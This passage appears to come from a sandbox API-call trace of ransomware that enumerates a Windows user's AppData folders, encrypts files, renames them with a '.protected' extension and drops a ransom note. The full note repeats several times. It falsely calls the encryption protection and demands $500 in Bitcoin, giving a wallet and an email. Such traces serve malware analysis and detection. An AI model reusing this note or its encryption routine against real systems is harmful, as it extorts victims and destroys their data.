lpString2="Windows") returned -1 [0090.175] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.175] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.175] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.175] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\.") returned 69 [0090.175] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.175] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.175] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.175] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.175] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.175] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.175] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\..") returned 70 [0090.175] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.175] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.176] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.176] lstrcmpiW (lpString1="Connections", lpString2="Windows") returned -1 [0090.176] lstrcmpiW (lpString1="Connections", lpString2="Program Files") returned -1 [0090.176] lstrcmpiW (lpString1="Connections", lpString2="Program Files (x86)") returned -1 [0090.176] lstrcmpiW (lpString1="Connections", lpString2="$Recycle.bin") returned 1 [0090.176] lstrcmpiW (lpString1="Connections", lpString2="System Volume Information") returned -1 [0090.176] 
wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 79 [0090.176] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0090.176] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0090.176] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned 81 [0090.176] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.176] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.176] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.176] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.176] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.176] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.176] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.") returned 81 [0090.177] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.177] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.177] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.177] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.177] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.177] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.177] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\..") returned 82 [0090.177] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.177] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.177] lstrcmpiW (lpString1="Pbk", lpString2="Windows") returned -1 [0090.177] lstrcmpiW (lpString1="Pbk", lpString2="Program Files") returned -1 [0090.177] lstrcmpiW (lpString1="Pbk", lpString2="Program Files (x86)") returned -1 [0090.177] lstrcmpiW (lpString1="Pbk", lpString2="$Recycle.bin") returned 1 [0090.177] lstrcmpiW (lpString1="Pbk", lpString2="System Volume Information") returned -1 [0090.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned 83 [0090.177] lstrcmpW (lpString1="Pbk", lpString2=".") returned 1 [0090.177] lstrcmpW (lpString1="Pbk", lpString2="..") returned 1 [0090.177] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned 85 [0090.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.178] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.178] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.178] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.178] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.178] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.178] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\.") returned 85 [0090.178] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.178] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.178] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.178] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.178] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.178] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.178] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.178] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\..") returned 86 [0090.178] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.178] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.178] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.178] lstrcmpiW (lpString1="_hiddenPbk", lpString2="Windows") returned -1 [0090.178] lstrcmpiW (lpString1="_hiddenPbk", lpString2="Program Files") returned -1 [0090.178] lstrcmpiW (lpString1="_hiddenPbk", lpString2="Program Files (x86)") returned -1 [0090.178] lstrcmpiW (lpString1="_hiddenPbk", lpString2="$Recycle.bin") returned 1 [0090.178] lstrcmpiW (lpString1="_hiddenPbk", lpString2="System Volume Information") returned -1 [0090.178] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 94 [0090.178] lstrcmpW (lpString1="_hiddenPbk", lpString2=".") returned 1 [0090.178] lstrcmpW (lpString1="_hiddenPbk", lpString2="..") returned 1 [0090.178] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned 96 [0090.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.179] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.179] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.179] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.179] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.179] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.179] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\.") returned 96 [0090.179] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.179] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.179] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.179] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.179] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.179] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.179] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.179] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\..") returned 97 [0090.179] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.179] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.179] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: 
lpFindFileData=0x295e2f0) returned 1 [0090.179] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Windows") returned -1 [0090.179] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Program Files") returned 1 [0090.179] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Program Files (x86)") returned 1 [0090.179] lstrcmpiW (lpString1="rasphone.pbk", lpString2="$Recycle.bin") returned 1 [0090.179] lstrcmpiW (lpString1="rasphone.pbk", lpString2="System Volume Information") returned -1 [0090.179] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 107 [0090.179] StrStrIW (lpFirst="rasphone.pbk", lpSrch=".protected") returned 0x0 [0090.179] lstrcmpW (lpString1="rasphone.pbk", lpString2="RESTORE_FILES.txt") returned -1 [0090.179] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.179] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.180] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 107 [0090.180] StrStrW (lpFirst="rasphone.pbk", lpSrch=".txt") returned 0x0 [0090.180] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 107 [0090.180] StrStrW (lpFirst="rasphone.pbk", lpSrch=".rar") returned 0x0 [0090.180] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 107 [0090.180] StrStrW (lpFirst="rasphone.pbk", lpSrch=".zip") returned 0x0 [0090.180] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0090.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.180] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0090.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.180] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.181] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.181] CloseHandle (hObject=0x158) returned 1 [0090.181] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk.protected") returned 117 [0090.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk.protected")) returned 1 [0090.182] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.182] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.182] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\RESTORE_FILES.txt") returned 112 [0090.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.182] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.182] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.183] lstrlenA (lpString="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") returned 684 [0090.183] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.183] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.183] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.183] CloseHandle (hObject=0x154) returned 1 [0090.183] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.183] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.183] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\RESTORE_FILES.txt") returned 101 [0090.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.183] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.183] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.184] lstrlenA (lpString="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") returned 684 [0090.184] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.184] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.184] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.184] CloseHandle (hObject=0x150) returned 1 [0090.184] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.184] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.184] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt") returned 97 [0090.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.185] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.185] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.186] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.186] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.186] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.186] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.186] CloseHandle (hObject=0x14c) returned 1 [0090.187] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.187] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.187] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\RESTORE_FILES.txt") returned 85 [0090.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.188] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
